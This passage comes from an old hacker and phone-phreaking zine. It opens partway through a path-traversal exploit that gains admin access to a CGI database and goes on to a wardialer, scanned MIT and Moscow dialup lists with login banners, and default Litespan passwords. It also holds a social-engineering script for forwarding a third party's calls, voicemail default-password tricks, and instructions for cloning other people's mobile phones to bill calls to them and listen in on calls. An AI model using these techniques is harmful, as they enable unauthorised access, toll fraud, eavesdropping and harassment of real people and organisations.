after the "../../var/ftp/incoming/werd". It does that automaticlly. You
may need to change the amount of ../'s dont' worry bout going over board
though. It will still work.
What exactly happens? Well, db_manager.cgi runs with whatever setup_file
you specified. It sees that the session_file variable is declare so
instead of going to the login screen, it reads the info from the session
file "Session_files/../../var/ftp/incoming/werd.dat" which contains
administrator status because the group is "admin". Boom. You're in the
database free to modify or delete anything.
The reason I found this out was because I found one interesting database I
couldn't search through without a valid username and password. So I did
this. I wouldn't modify anything because who cares.
Cain
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
===============================================================================
==[ FONES / SCANNING ]=========[ .SECTION C. ]===========[ FONES / SCANNING ]==
===============================================================================
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
1. ShokDial : Shok
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Originally written based on an idea by zer0x, and written for public
release, this article is NOT property of THTJ, because they are fucking
sIn groupies, this was written by Shok, and therefore is intellectual
property of that author, so don't even think about it you fucking THTJ
fools. --so1o
Serial programming for unix.....boy this stuff is fun. Well unix
is famous for it's special files. The modem is just a file you can open(),
read(), and write() to...for that reason this program can be used on all
unixs'. The only thing different that needs to be changed, is the
#define MODEMPORT "/dev/cua1", because most unix/unix clones have their
own modem port. For example /dev/ttyS? which is COM1 (to the DOS users),
would be /dev/ttym? in IRIX. Now once this program opens the modem (via
device/special file) for reading/writing, it will write() to it, and send
it standard modem instructions like +++ATH, ATZ etc....this comes before
any dialing to get the modem ready....we also use a function to check for
"OK" so we know that all is well. On receiving this, then enter the number
we want to dial into a character buffer, append a "\r" to it (to it
actually sends the command), we then write(fd (the file desc. for
/dev/cua1), thebufwiththenum, strlen(thebufwiththenum)); Now once you do
this..you can't write "+++ATH" to it, because it will send that as the
login name (assuming you've connected to a host), so what I did, was I
opened the other modem port (there are two, /dev/cua0 and /dev/ttyS0 are
essentially the same thing (both COM1 to explain it easier), one is used
for dialing out (cua?) and one is used for dialling in and out (ttyS?). So
I opened up the other port and used that to send the command to hang up.
But all the other stuff isn't complex, they are all C primitive
instructions like ScanMin++; which would increse ScanMin by 1, repeat a
while loop, and then the next strcat(phonenum, ScanMin); ... would dial
the next number......you get the idea. That's about all there really is to
say about the technical stuff about it.
Oh yeah one thing.....when it connects, it looks for the string
"CONNECT" returned from the modem serial file. You won't get this message
from faxes as you will only get this message when the connection is
complete, so this will only return *** CONNECT *** if it was a modem. It
will both output to the screen and logfile *** CONNECT *** to
1-xxx-xxx-xxxx. You can use local or long distance, although international
numbers haven't been added at this time (not hard to do just didn't care
to add an extra scanf and an extra CountryCode variable ;)
About ShokDial (it's temp name for now)
---------------------------------------
This supports random scanning (pseudorandom to be honest, heh) and
sequential (the range you specified and up) scanning. You can give it a
range too but that still does under sequential scanning. To use random
scanning use 'shokdial -r', otherwise it will by default use sequential
scanning. For the other options type 'shokdial -h'. You want to keep track
of the version because I'd almsot guarntee this program is going to
continue changing. I need to add some ncurses GUI effects (heh) and a
function to resume scanning for those of you who are too lazy to even look
at the (by default) wardialer.log and get the last number it dialed
(assuming you used sequential scanning) and entering that as the Scan
number to begin on!
It will output to wardialer.log and on to the screen. If you have
BEEP = WANTBEEP in the Makefile, it will beep when it connects to a host.
That's about all I really have to say about it. I don't actually use war
dialers (really), so I haven't actually tested this (sorry if there are
any problems but there shouldn't be)....if you do however find a problem,
please let me know! I will fix it and send out a patched version.....you
can get all of them from ftp.janova.org or www.janova.org. Enjoy ;)
Shok
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
2. More MIT dialups : zer0x
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
In CRH issue #5 I listed the mit guest terminus dialups, which you could
use to telnet from. Here is a different one...
1. MTL Terminal Server
----------------------------------------------------------------------------
Here is a 'private' telnet dialup, no 'guest' access allowed, unlike
Terminus. It may go down or have a password added to it if they notice all
this extra access.
MTL Terminal Server (mtl-ts.lcs.mit.edu)
258-7626
258-7623
----------------------------------------------------------------------------
2. I have scanned the mit prefix and here are some of the carries I have
found. I'm not sure what this can really be useful for but to maybe know
the dialup number if you ever own one of these machines. Or who knows,
maybe one of the default logins works for one of these machines,
[hint hint ;)]
258-7279 nastasia (os:unix) [nastasia.mit.edu]
258-7934 (os:unix) [unknown host]
258-7238 bozo phone login: (os:unix)[bozo.mit.edu]
258-7780 servi login: (os:unix) [unknown host]
258-7967 mit center for space research (os:unix) [hoku.mit.edu]
258-7936 (os:unix) [host: unknown]
258-7838 (os:vms) [host: unknown]
258-7108 Annex Command Line Interpreter for Annex Reuter
258-7958 (MIT Center For Space Research) (os:unix) [grall.mit.edu]
----------------------------------------------------------------------------
NOTE:
-----
Maybe there were a few machines I didn't put down, possibly because they
were important to me and I did not feel like disclosing them. Maybe I will
place them in later issues, who knows. Scanning colleges is always fun
because you find neat stuff. Some machines even have outdial modems attached
to them :) A good way to find stuff like that is to find the prefix that a
uni puts their machines on and scan scan scan. Also a big company may have
plenty of machines sitting there waiting for you to find and own. Some people
may think that scanning is a bit outdated but it comes in useful. I suggest
you use toneloc if you wish to scan since it is the best dos scanner.
For Linux use Shok's scanner (ShokDial), which is in this issue.
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
3. Hiding within the system : efpee
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
"w1ll i ever g3t caught....."
"Guess what !@#$ i figured it out.. i can finally ani sp00f with
32.666.666.666 hz tone," - " unkn0wn person
I get sick and tired of people... in general explaining to me
how fucking kewl it is to go down to a payfone, and make generous
calls with a redbox. I find that shit so annoying.. I know
the majority of the people reading this are gonna say.. "y0
3y3 JUST R34D 2600 and 3mm4nu3l t0ught m3 b0ut inb4n signalling
4nd h0w to bu1ld a r3db0x.." - unkn0wn person
The main reason anyone ever walked to a payfone in the first place
was really to lesson the chance of being "..traced.." Let me
tell u dumbfucks.. ani is everywhere so dont think just cause u
c4n g0 to a payfone u are not gonna get caught.. oh.. btw..
ST0P BU1LD1NG R3DB0X3Z
using pbxz, and k0d0ez!#@%$
is less painless, and
doesnt cost u m0ney!@#$
. sektion 1 .
Diverting has been around since the days of the Capn' Crunch
and h1s fux0ring wh1stle. To bad.. if u even want3d to attempt
to d1vert with blueb0xing u end up using 800 direct numberz to
countries such as gr33ce. Th1s is all g00d.. but again.. A
B1TCH. Cause w3 dont all h4ve blueb0xes.. and n0t everyone
has a laptop to carry round with onkels little bluebeep.
the only th1ng bout that program that was good was the neeto
ascii/ansi art. Anyway.. when u think of diverters wh0 comes to
mind?
AT&T - = - ani is dr0pped wh3n diverted to through intercept op
MCI - = - these are the g00d guyz :P
W0RLDC0M - = - p4yf0ne please
OCI - = - these stup1d sp1cs have ani n0w :(
TELTRUST - = - <----------- th3 supr3m3 in my l1f3 :)
Teltrust has nifty little backd00rs that allow u to access
operators usually only allowed through dialing 0 on a teltrust
serviced. i c4nn0t release th1s t0p s3kr3t enph0.. but its
out there.. Op back doors are hard to find but... then again
u have all the time in the w0rld.
th1s is m33 4nd my teknique...
mee ------> operator -----> vmb with 800 dialout ---> meridian
-----> at&t ------> 911 b4ckd00r ----> c0pz pull up 0utside
so1o's house...
eyem gonna take u through my easy st3p plan of h0w to d1vert
fr0m home, and seldom get caught..
1. Oldskewl stealing of service fr0m neighbor
2. C4ll f0rw4rding st1ll 0wns u.. and if u kn0w much bout switches ;)
th1s can aid u greatly in diverting.. Setting up your own diverters
w1th c4ll f0rwarding is th3 m0st safest sh1t, cept... please divert
wh3n owning your local sw1tch... unless its us west.. they d0nt have
ani @#!#$!@#$ i swear ( well i w1sh ).
h3r3z l33t pr0ceedure f0r adding call forwarding under 1a.
RC:CFV:\ add1ti0n of f0rwarding features
ORD 1\ sp33d of activation :) 1 = n0w damn it
BASE XXXXXXX\ th3 l0cal number u are add1ng features too
TO XXXXXXX\ route to where? 801 855 3326 "y0u h4ve r3ached bah"
PFX\ s3t pr3f1x 1 if ld dialing.. although i believe 800 is
possible
! execute damn it..
my l0cal switch being 1a.. dats all eye deel with.. but...
5e becomes easier d0 to the fact that if u have access to
recent change channels on a 5e.. or rcmac sk1lls..
u can easily add forwarding...
The 5e rc/vfy is s0 much simpler... its call3d w1nd0ze 5e..
with neet little ascii menus..
If y0u are n0t an rcm4c w1z...
The business office werkers are clueless..
i use uswest as my example m0stly d0 to them being my rb0c..
but anywayz.
me> dials 18002441111 (servicing for home usage)
automated attendant> Enter Area C0DE and 7 digit number
me> 3608646226 <--------ex girlfriendz
aa> real attendant.... c0uld u please give me seven digit
number u are calling about please
g1ve it t0 real attendant.
me> uh yes 3608646226
ra> h0w can i h3lp u Mr J0hnson.
me> w3ll ummm uh me and family are going out of t0wn for a week..
me> i w4z wondering if u c0uld add f0rwarding or f0rward all my calls to
me> 8018553326 . . . . . sure th1ng mister j0hnson.. they w1ll then say..
ra> th1s feature will be online by 5:00 tomm0row nite..
me> U SP1C 0F 4n Op U D!dnt ASK f0r Any ID!@#$ bahahahahh 0wned
. sektion 2 .
voice mail systems have been around for ever...
all had oftered the same benefits under systems
such as audiotext, audix, asp3n and older systems.
these days the p0ssibilites are endless.
some of the newer syst3ms.. that unf0rtunately i dont have
actual hard copy f0r.. carry newer features... this includes
b0x forwarding, pager n0tification, c4ll f0rwarding, and
message f0llow mee..
for inst4nce... dial 1800xxxxxxx
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Back to basic vmb hack1ng
these new little systems include
pr0mpts such as enter box number
and password.. this rem0ves the
ease and makes it almost impossible
to hack. Yes.. search f0r systems
u kn0w have outdial capabilities
9999 is still the admin b0x
9999 is still the most common used password
Newer systems are adding l0nger k0dez.. and sumtimes only
codes but no actual box number. anyway.. h0w can this help
u in diverting..? After u have owned vmb with 800 access?
well simple really.. it can be used f0r number of things..
dialing att mci and maj0r ld companies f0r ld purposes
totally legit of course.. The pager n0tification feature owns
me. herez the tekniq
call business office.. like in above insert
and add call forwarding to a fone or number u kn0w never
gets called.. forward it to an0ther number.. have that number
forwarded.. at the end of chain .. put your pager number :)
n0t like this isnt obvious or anything.. they just c4nt pr0ve nuffin.
its neet to listen 1800864BLAH call my pager after bouncing through
all these neet forwarded numbers and hitting the u have reached
a pagenet serviced pager... please leave numeric message
at the tone, and hit star when finished. I just wanna make
aware things people have forgotten about.. people spend to worrying bout
" the switch, rcmac, nac, scc " and all the nitty gritty of a boc. Think
of what can be done without even hassling..
. pbx .
u have read billion txt files on pbxs.. i just recommend reading
cavaliers.
bah hit *9 or dial one of those nifty 800555xxxx pbxs with 2 digit
codes.. oh btw.. th0se ones are probably traps for defcon kids.
. sektion 3 .
my thoughts on tracing...
listen.... in our day and age.. it is very easy for u to be traced..
the thing is, cdma, wireless, broadband, cellular communications is
aiding us. If u have a modded oki with antitriangulated mods plus
b1llion pairs..? WH0 ARE THEY TRACING .. the ani .. is always there
ani failures is yes.. likely to happen every once in a while when to
sw1tches d0nt c0mmunicate .. but g0d damn people..
anyway..
th1s f1le pr0bably did nuffin for your clooless self..
but maybe spawned a couple ideas in your head such as
efpee diverting diagr4ms
mee -> oki -> pbx with intercept opt access at *9 -> opdivert -> vmb with
800 dialout -> teltrust -> k0d3z -> pbx -> sekret service in 206
"TR4C3 TH1S MUTHA FUCK3R"
I typed in 30 minutes without leet speek filter..
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
4. An introduction to LightSpan 2000's : dlc
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
1 : The Basics.
---------------
This article is going to be broken up into 3 parts because for convenience.
Here is the first, if you don't understand this, don't move on. Also if you
don't need to know anything about lightspans don't bother reading this act
of masochism.
A Litespan 2000 unit is a Synchronous Optical Network (SONET) based Optical
Loop Carrier (OLC) system. It provides the function of four seperate systems
cobmined into one. Those systems are as follows:
Digital Loop Carrier (DLC).
Provides 2,016 DS0s of bandwidth for delivery of services such as data,
coin, or dial tone.
Digital Cross Connect System (DCS).
Takes apart DS1 signals into DS0, rearanges them and puts them back
into DS1 signals. This is know as 1-0-1 cross-connect.
SONET Fiber transport system
Uses lightwave technology and SONET protcol to transport signals between
lightspan terminals.
Mulitplexer (MUX)
Takes multiple low speed signals (DS0s, DS1s) and interleaves them
to form a single high speed data stream at SONET bit rates.
2 : System Security.
--------------------
Litespan 2000 unit security is very simple, but when considerig it
accessability by outside systems, it is adequate. If you ever get access
to a litespan 2000 terminal or are able to access it remotely this may help.
The Litespan provides two levels of security to maintain system integrity.
These security levels controls who can access the system and what the
authorized user is allowed to do in the system.
Each authorized user is assigned a set of privleges that determine the
actions allowed to the user.
The Litespan maintains an internal list of authorized user IDs, passwords,
and user privleges. There are up to 20 users possible.
Now to access security you will be prompted for a User ID and a password
at a terminal that looks much like this :
OMAPS Log In
OMAPS V05.01.05 Copyright 1997 Optlink Corp. All Rights Reserved
User Id:
Password:
Now for the ball busting part. If you repeat the login procedure
incorrectly 5 times you will be locked out of the system. Also the user
ID's can be up to 20 characters, a number or letters with both upper and
lower case, this is the same with the password.
The litespan has a sysadmin like in a unix system, but the litespan admin
usually has a long beard and a smug expression. But it is possible that a
dumb sysadmin will leave in the default logins/passwords. Those are as
follows:
User ID: optlink
Password: optlink
and..
User ID: sysadmin
Password: sysadmin
...Well that gives you a look at System Security from the outside, Look at
part 3 if you were able to get in. It gives a run down on User Privleges.
3 : User Privileges.
--------------------
Well user privleges are important, the sysadmin maintainsa file in the
system that gives different users different privileges. The user
privileges file will be setup somewhat like this:
User Id Password CP M M0 M1 N NR P PR P0 P1 S T
Fatass ***** x x x x x x
BigBone ***** x x x x x x
That is a basic layout. The CP, M, M0 ect. are privileges.
The X's are basically checks allowing a certain user to perform a certian
act in the system. The Different Privleges are as follows:
CP = Allows someone to change the user ID, password or privileges of
any user on the system. This is one of the sysadmins privileges
for the most part.
M0 = Maintenance privilege (DS0 only)
M1 = Maintenance privilege (DS1 only)
MR = Maintenace READ ONLY privilege
N = Network Administrative privilege; Allows backup and
restore of database
NR = Network Administrative READ ONLY privilege; Allows access to network
information
P = Provisioning privilege; Neccesary to make changes from the
provisioning menu
P0 = Provisioning privilege (DS0 only)
P1 = Provisioning privilege (DS1 only)
PR = Provisioning READ ONLY privilege
S = System Administrative privilege; Neccessary to make changes from
the administrative menu
T = Testing privlege; Allows execution of testing commands
Well that about raps it up. I may in the future update this,
But I doubt it. Look for future papers by me.
dlc
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
5. An introduction to the NEC P3 : daxx
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
The NEC P3 is a rather old mobile phone for use on any TACS or E-TACS
cellular telephone system (there is a list at http://c5.hakker.com/nec_p3/
to find out where there are such networks ; they exist in Europe,
Austria, Italy, the UK and Ireland). This phone was quite popular a few
years ago, so you should be able to pick one up used for little money.
I got one including two batteries & a charger for 50 IEP.
Now, what makes this phone so interesting? The availability of a
so-called Test-Mode-ROM for it!
As all mobile phones, this one has a read-only-memory chip in it, which
contains its software. This progam is started when you turn on the phone,
it could be compared to a computer's operating system. While the "normal"
version of the NEC P3's software allows you to do no extraordinary things,
basically only to place calls to a number you enter and to store numbers
along with names, the test-mode software lets you go into test mode, where
you can do many cool things...
Most importantly, you can change all the information in the phone's NAM
(number assignment module) - the ESN (electronic serial number) and the
MIN (mobile identifier number).
These two numbers are all there as an E-TACS phone's identity - program
in another phone's ESN & MIN (this information is called a pair) and
your NEC P3 becomes a clone of it. You will be able to make calls on the
bill of the phone you cloned and to receive calls under its number.
On a test-rom NEC P3, this process of reprogramming the NAM takes less
than a minute of pressing buttons on the keypad, and requires no connection
to a computer with a "chipping lead", as the vast majority of mobile phones
do. However there are plans for a computer-to-P3 cable, along with chipping
software, both are available on Dr. Who's Radiophone, which is now at...
http://radiophone.dhp.com/nec/p200.html
The MIN prefix for Ireland's 088 network is 2720 (088-2 = 2722, 088-6 = 2726).
So if somebody's number is 088-313371, their MIN, and what you type in while
programming, is 2720313371. The ESN of a phone (an 11 digit number with
slashes dividing it) can almost always be found on a sticker on the back of
the phone, under the battery. So if you see someone's phone lying around,
just note down those numbers, put them in your P3, and mess up their bill.
In test mode, you can also scan all channels (listen in on calls going on
in your area), and break into conversations (can be funny, the call has to
be on a very nearby cell for that to work though). I've also put on a text
which describes how two P3's can be used as CB radios, without actually
using the cellular network (never done this myself, can anybody confirm that
this works?).
You have a P3, and would like to put a test-mode ROM in it?
Taking the actual chip out of the phone, or putting one in can be tricky,
the first and biggest obstacle being "tamper-proof" screws in the case.
However pliers with very thin ends worked OK, once I found suitable ones.
The complete instructions for doing this can also be downloaded below.
Getting the test-mode software (see below for the image file) written on
the existing rom chip from a P3, or getting a new 27C512 (200 nanoseconds
access time) EPROM with the software on it is probably the most difficult
part. You could try some electronics companies or university electronics
labs, or any other place which might be able and willing to write an EPROM
for you. This only takes a minute, but a previously written EPROM has to be
erased by exposure to UV light before being re-written, which takes at
least half an hour.
Further files are available from http://c5.hakker.com/nec_p3/
There's an easier way to get into test mode than the one. As you can simply
store your ESN in one of the 99 memory slots once (enter 11 digits, STO
(for instance) 68). Then every time you want to enter, you do RCL 68, STO 69,
RCL *, RCL # 01 and there you are, instead of keying in the whole ESN every
time.
So, go out, get a P3 or another kewl fone and have some fun while the E-TACS
networks are still on the air!
DaXX
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
6. More Russian dialups : Lirik
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
+7-o95-913-xxxx Iskra(?) Telco scan for carriers
(?) 1997 CyberLirik/DarkMoon
with ToneLoc 1.x
comments to lirik@hotmail.com
also check out http://207.222.215.67/________.lst
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
9133087 MMTEL> .x to get RemoteAccess 2503107111
.m to connect to MFD
PAD NUA format : NUA with DNIC ie MMTEL>2503107111
9133442 27*
9133440 36*
9133438 34*
9133437 33*
9133439 32*
9133994 login:
9133340
9133465 CONNECT 2400/NONE
9135899
9133353
9133467
9133094 MICRON: ADDRESS?
9133093
9133487 MS DOS 6.20 :)(krug.partya.ru) ((null)) login:
9133118 S'Ad;r+kE:q't`aqQ1<8;
9133507 *****************************
9133127 Port 1 login:
9133392 ROSPAC(IASNET) Local Dial Ups 02500 DNIC also TYMUSA
[unpublished] ntymusa .concert+ for TYMUSA
9133578 HqS$=x1*M!J>8uF
9133336 0211
&v3
&v3
&v3
&v3
&v3+++
9133327 +++
9133418
9133297 BSDI BSD/386 1.1 (berenduin.comdiv.inkom.ru) (ttyb6)
login:
9135745 FrontDoor 2.02; Noncommercial version
9135741 see Nodelist for more systems
9135611 ( 913- & Iskra2 like
097-3xxxx)
9135644 2:5020/439@Fidonet
9135982
9135903
9133478
9133503
9136066
9136007 2:5020/194@Fidonet
9136347
9132354
9137134
9139888
9133414 0211
iCv3
iCv3
iCv3
iCv3
iCv3+++
9133117 PPP trash ~~}#@!}!Q} }4}"}&} }*} }
9134214
9135937
9133514 Welcome to SCO UNIX System V/386 Release 3.2 psl055!login:
9133038 Welcome to Linux 2.0.29. **EMSI_REQA77E
9133379
9133119 S'Ad;r+kE:q't`aqQ1<8;!nPSHHNrkShD
9133161 vBB
Pl[EBad_Ver<
9135307
9136142
9136254
9135308
9135797
9138590
9137100
9138569
9137177
9136227
9133944 (gamma!uugate3) login: www.gamma.ru ISP
9132071
9133344 Telebit's NetBlazer Version 2.3 NB_CROCUS login:
9134392 ~?[l~m^p.:$KJ'b4f4wB& 9uJ@0@abfD4*
9134217 Login: PassWord:
9134257 INCOM_ZNANIE
9134228 Welcome to X Atom Network
9134091 Sorry no BBS avalable on this phone
9134092 atom.ai.x atom.net!login:
9134221 Welcome to FaxNet IP network Login:
9134114 "%$(b% a".% (,o :
9134419 ¥à¢¥à ¤®áâ㯠ª ä ©« ¬
9134418
9134488
9134489
9135864 Username: % Username: timeout expired!
9135865
9135856 Enter: M menu driver, A ANSI, else N >
9135898 WindowsNT 4.0 (credit.roscredit.msk.su) (tty00)
9135319
9135751 SpaceNet Dial Up Gateway Problems: noc@space.ru 333 3523
9135020 www.space.ru
9135619 ICAICAICAICAICAICAICAICA
9135627
9135652
9135651
9135618
9135622 ~?[l~~?[l
9135640
9135995 QuickMail(tm) Copyright 1988 95 CE Software, Inc.
9135706 **B0100000027fed4
9135966
9135883
9135820 faxnet10 login:
Welcome to the INTERACTIVE UNIX Operating System from SunSoft
9135626 Moscow DAWN 2.Relcom.EU.net
9135747
9135624
9135870 User Access Verification
9135798 ~?{=~~
9135602
9135810 Welcome to the TECHNOBANK Client Bank System !
System name: techno
9135811 DIMON
9135641 Avtovazbank Guest/guest also x.25 NUA in Sprint 772855.1
9135621 USRobotics Courier HST Dual Standard V.34+
Fax Dial Security Session
Serial Number 9909550000181645
9135941 ~}|{
9135821 BSDI BSD/OS 2.0.1 (iskra.msk.su) (tty01)
9135921 Please press <Enter>... Enter password:
9135082 ]w]w]w]w]w
9135799
9137143
9136077
9137184
9136371 russica!login:
9136265
9136259
9136319
9136258
9136223 FreeBSD (ns.irex.ru) (ttyx2) login:
9136236 Welcome to Moscow Government's Mail Server
9136233 Contact phones is 200 5382, 200 5935
9136234 mshost!login:
9136997 Registered users only. Anonymous access denied. login:
9136173 =CREDO BANK= Bldg. 2, 9 Sadovay Sukharevskaya St.
9136311 Telecommunication system of the
9136316 State Tax Service of Russian Federation
9136368 23, Neglinnaya str, Moscow.
9136369 X.25 0250021500600
9136284 ENTER YOUR NAME =>
9136313 PASSWORD =>
9136958 The system's name is globex.
Welcome to USL UNIX System V Release 4.2 Version 1
9136953 +++e
3td|t63@EBwN,(qECKt3BY0C4x
9136232 Trying 10.31.11.4 ... Open
9136242 ENTER YOUR NAME =>
9136210
9136304 BrakyTerm Mailer 0.01.9ESPM
9136395 .!`. /.& +." bl!
9136984 Russian Trading System (Telecommunication Center, Cisco 2511 1)
9137236 User Access Verification
9137228
9137248 Russian Trading System (node MSK_NCC) port 11(0)@
9137203 @
9137224 @HELP
9137211 @.uucp connected
9137218 @.CRT
9137213
9137243
9136175 ~HM
9136052 l'@kN,$?<~1!\_t
j6Cv!DR})i@D@CrO0|6qZ73d<D19I
%
9138037 Welcome to Demos (hq 4.Demos.net)
9138265 l/p: _demo/demo
9138271
9139495 BÆôCAÌÈÎÈÈÎÈÈTaÞÜÜÌ
9139604 The ITEPNet IP Router Nb.ITEP.RU
Version: Telebit's Netblazer sft. 2.1
9134302 ~?[ì
9135062 DataX/FLORIN, Inc. CISCO 2509 Router
mitia@florin.ru +7 (095) 158 9520 +++
9135832 .
9135870 User Access Verification
9132097 ®¡à® ¯®¦ «®¢ âì ¢ ⥫¥¬®áâ akb Username:
9139250
9139994 0
9139279 Welcome to network L CARD Node : l card.msk.ru
Free entry: GUEST
9132979 }T
9138588 Network Access SW V1.5 for DS90M (BL95 32)
Please type HELP if you need assistance
Enter username>
9139773 INCOMHOSTÿÿ
9133598 Network Access SW V1.5 for DS700 08 (BL95 33)
ElecsBank DS700 8 Communication Server
BRAVO>
9135815 p
9139234 ÅÒÒ
9137270 ä®à¬ 樮®¥ £¥âá⢮ ¥¤¥à «ì®£® ¥ªá¥«ì®£® ®¬
WWW c¥à¢¥à: WWW.molot.ru
᫨ ë ¥ § ॣ¨áâà¨à®¢ ë, â® è login: guest (£®áâì)
9137166 Only for @MAIL (other NUAs do not work)
Sprintnet Local Dial-Ups 02501 & 03110 DNICs
GlobalOne = Sprintnet = Telenet
send "@D<enter>"
send "d1<enter>" on TERMINAL= prompt
type NUA on @ prompt (details http://207.222.215.67/x25.html)
9139936 PPP for enterprise customers GlobalOne
9133571 RosNet Dialup 02506 DNIC
http://207.222.215.67/x25.html
try 6100255 address
9132376 Russia@Online DialUp 30 lines
9138111 33.6 www.rinet.ru Login: guest
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ X3(unknown) systems ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
9135646 9138173 9136024 9138294 9138453 9136235 9137012 9137231
9135705 9136093 9132252 9138365 9133551 9136046 9136082 9136235
9136034 9136370 9136021 9133498 9133069 9133241 9133916 9133021
9133918 9133398 9134009 9134239 9134425 9134421 9134422 9134094
9134069 9134560 9134218 9134258 9135951 9135364 9135922 9135177
9135088 9136457 9136498 9136239 9136185 9136139 9135381 9135705
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
7. UK x.25 network numbers : Cold-Fire
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
AT&T Istel
----------
01224-582082 Aberdeen
01224-580217 Aberdeen
01970-611022 Aberystwyth
01904-430404 York
01522-512050 Lincoln
01292-289595 Ayr
01245-267167 Chelmsford
01295-272828 Banbury
01271-449281 Barnstaple
01203-552092 Coventry
01705-327575 Portsmouth
01223-314594 Cambridge
01232-661188 Belfast
01232-661733 Belfast
01533-750240 Leicester
01527-584546 Redditch
0121-478-0002 Birmingham
01604-230734 Northampton
0191-386-2822 Durham
0117-279139 Bristol
01202-530882 Bournemouth
01392-217071 Exeter
01742-729590 Sheffield
01273-206733 Brighton
01582-401887 Luton
01273-820236 Brighton
01733-555575 Peterborough
01782-289866 Stoke-on-Trent
01383-737557 Dunfermline
01272-279138 Bristol
012572-65571 Chorley
0117-279808 Bristol
01752-673352 Plymouth
01532-424111 Leeds
01223-323155 Cambridge
01463-243411 Inverness
0171-831-9097 London
01227-450941 Canterbury
01227-453502 Canterbury
01892-515580 Tunbridge Wells
01473-231631 Ispwich
01422-330585 Halifax
01962-844211 Winchester
01222-460888 Cardiff
01602-475161 Nottingham
01634-815055 Chatham
0181-965-7767 London
0141-566-3334 Glasgow
